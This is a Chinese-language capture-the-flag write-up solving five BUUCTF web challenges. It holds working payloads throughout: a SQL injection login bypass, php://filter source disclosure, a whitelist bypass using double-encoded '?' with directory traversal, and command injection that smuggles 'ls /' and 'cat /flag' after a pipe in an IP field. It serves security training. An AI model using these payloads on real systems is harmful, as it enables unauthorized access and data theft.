[极客大挑战2019]EasySQL

1
2
admin' or 1=1#
123456

‘#’是注释符,相当于

1
SELECT * FROM users WHERE username='admin' or 1=1 --' AND password='123'

[极客大挑战2019]Havefun1

查看网页源代码,有注释

1
2
3
4
5
6
7
        <!--
$cat=$_GET['cat']; // 从URL的GET参数中获取名为'cat'的值
echo $cat;          // 输出这个值
if($cat=='dog'){    // 如果获取到的值等于字符串'dog'
    echo 'Syc{cat_cat_cat_cat}';    // 就输出这个看起来像flag的字符串
}
-->

在url中添加get参数为cat=dog

[ACTF2020新生赛]Include

点进tips

1
http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=flag.php

根据file=flag.php可知,可能考察文件包含
使用php伪协议读取源码(php://filter)

1
php://filter/convert.base64-encode/resource=目标文件

1
http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php

得到:PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmQzZGM3YjEtNTNjNC00NTY1LTg2MDItOGZhOTUwOGUyOGY1fQo=
进行base64解码

Base64仅包含 A-Z、a-z、0-9、+、/ 和填充符 =
得到flag

[HCTF 2018]WarmUp1 (php 代码审计)

查看网页源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

查看source.php

1
http://d809957d-6301-4f3e-b94f-5b6706582f61.node5.buuoj.cn:81/source.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

需要看file中传的东西,发现函数中定义了两个白名单,查看hint.php
‘’flag not here, and flag in ffffllllaaaagggg’’
在source.php中,如果 $page 包含 ?,则截取 ? 之前的部分,检查是否在白名单内
则两次编码?,得到%253F
经过不断的退目录尝试

1
http://d809957d-6301-4f3e-b94f-5b6706582f61.node5.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg

得到flag

[ACTF2020 新生赛]Exec1

1
2
3
127.0.0.1|ls /
127.0.0.1|ls /flag
127.0.0.1|cat /flag

得到flag